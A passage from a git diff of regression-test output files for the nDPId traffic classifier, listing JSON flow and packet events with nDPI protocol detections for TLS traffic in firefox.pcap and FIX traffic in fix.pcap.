+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620927999140,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620927999140,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmRAbvLRPivcgRn2oAQECxYiwAAAQEICjQMmZ88IAx9"} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","packets-captured":5441,"packets-processed":5441,"total-skipped-flows":0,"total-l4-data-len":4593506,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1620927999948} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5441/5441 diff --git a/test/results/fix.pcap.out b/test/results/fix.pcap.out index 31ae6ab01..2c9efd784 100644 --- a/test/results/fix.pcap.out +++ b/test/results/fix.pcap.out @@ -1,77 +1,77 @@ 00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fix.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1493755109242} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109242,"pkt":"THK5MeMlACJNe\/gxCABFAACKT3MAAPUGlw4IERYfwKgAFA+gqko3bYCMRQ1qAYAY\/\/+s3wAAAQEICsq+JozkIvOrOD1PATk9MDA3NQEzNT1HAQIgAAANgQxAKWj1wo9cKQAAAAEAABRnDEBj4euA7PpqAAAAAQAADiEMQENwo99tuUEAAAABAAAMAwxAYm64YJmdywAAAAE="} -00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1493755109243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109243,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04yxAAEAGeKvAqAAUCBEWH6pKD6BFDWoBN22A4oAQ\/+CtQgAAAQEICuQi8\/bKviaM"} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1493755109243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1493755109243,"pkt":"THK5MeMlACJNe\/gxCABFAABNT3sAAPUGl0MIERYfwKgAFA+gqko3bYDiRQ1qAYAY\/\/8cMQAAAQEICsq+JozkIvOrOD1PATk9MDAxNAEzNT1QAQA4AAAUjFEGgw=="} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1493755109264,"pkt":"THK5MeMlACJNe\/gxCABFAABSVaMAAPUGkRYIERYfwKgAFA+gu2Bwv8eLGL2htoAY\/\/8FlAAAAQEICsq+JqLD2CKPOD1PATk9MDAxOQEzNT1QAQBgAAAA1ygEAAAC+SgE"} -00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1493755109265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109265,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0nQVAAEAGvtLAqAAUCBEWH7tgD6AYvaG2cL\/HqYAQ\/+ACDgAAAQEICsPYIsvKviai"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAABPilIAADIGAaLQ9WsDwKgAFA+gsgqYEHEay+C1D1AYXjiwMAAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoLPdAAEAGESTAqAAU0PVrA7IKD6DL4LUPmBBxQVAQ\/\/9nMgAAAAAAAAAA"} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAAB3JWUAAPUGwS8IERYfwKgAFA+gu1Cc6Eb967pj5oAY\/\/+1oAAAAQEICsq+Jsaxc69UOD1GSVguNC4xATk9MDAwMDQxATM1PTABMzQ9MDA2MTI3ATQzPU4BNTI9MjAxNzA1MDItMTk6NTg6MjkBMTA9MTEzAQ=="} -00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB+LPhAAEAGEM3AqAAU0PVrA7IKD6DL4LUPmBBxQVAY\/\/8uDQAAOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04B5AAEAGe7nAqAAUCBEWH7tQD6DrumPmnOhHQIAQ\/+BBSgAAAQEICrFztPLKvibG"} -00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1493755109365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1493755109365,"pkt":"THK5MeMlACJNe\/gxCABFAABXdbIAAPUGcQIIERYfwKgAFA+gu2Bwv8epGL2htoAY\/\/9rRwAAAQEICsq+JwbD2CLLOD1PATk9MDAyNAEzNT1HAQCIAAAA1gw\/8YUeuFHrhQAAAAE="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109440,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzMAADIGwMTQ9WsDwKgAFA+gshDsZRC0r0wvBlAYWghECQAAOD1PATk9MDAyNAEzNT1HAQCIAAAAVgxAWLVwoAAAAAAAAAE="} -00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109440,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPkFAAEAG\/9nAqAAU0PVrA7IQD6CvTC8G7GUQ11AQo65yMAAAAAAAAAAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755109654,"pkt":"THK5MeMlACJNe\/gxCABFAABbr+gAAPUGNsgIERYfwKgAFA+gu1oMn5kifDan54AY\/\/9QgQAAAQEICsq+KCgaP0xfOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"} -00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}} 